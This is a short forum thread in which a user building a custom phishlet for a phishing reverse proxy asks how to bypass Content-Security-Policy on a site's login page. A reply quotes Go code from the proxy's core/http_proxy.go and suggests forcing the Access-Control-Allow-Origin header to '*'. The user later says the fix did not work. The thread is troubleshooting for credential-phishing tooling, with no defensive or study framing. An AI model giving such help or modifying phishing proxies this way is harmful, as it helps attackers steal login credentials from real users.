Hello, I have been having some issues on my custom phishlet I try to create because my page keeps getting block by csp and I will like to know the best way to bypass csp on sites login page
try modify source for following part and add *
allow_origin := resp.Header.Get("Access-Control-Allow-Origin")
if allow_origin != "" && allow_origin != "*" {
if u, err := url.Parse(allow_origin); err == nil {
if o_host, ok := p.replaceHostWithPhished(u.Host); ok {
resp.Header.Set("Access-Control-Allow-Origin", u.Scheme+"://"+o_host)
}
} else {
log.Warning("can't parse URL from 'Access-Control-Allow-Origin' header: %s", allow_origin)
}
resp.Header.Set("Access-Control-Allow-Credentials", "true")
}
from core/http_proxy.go
Do I edit and replace the code in http_proxygo with only the code you gave me?
atthe end of the code add
resp.Header.Set("Access-Control-Allow-Origin", "*")
Okay thanks I will try that
Hi, I tried your suggestion and it didn’t work and still the page wasn’t showing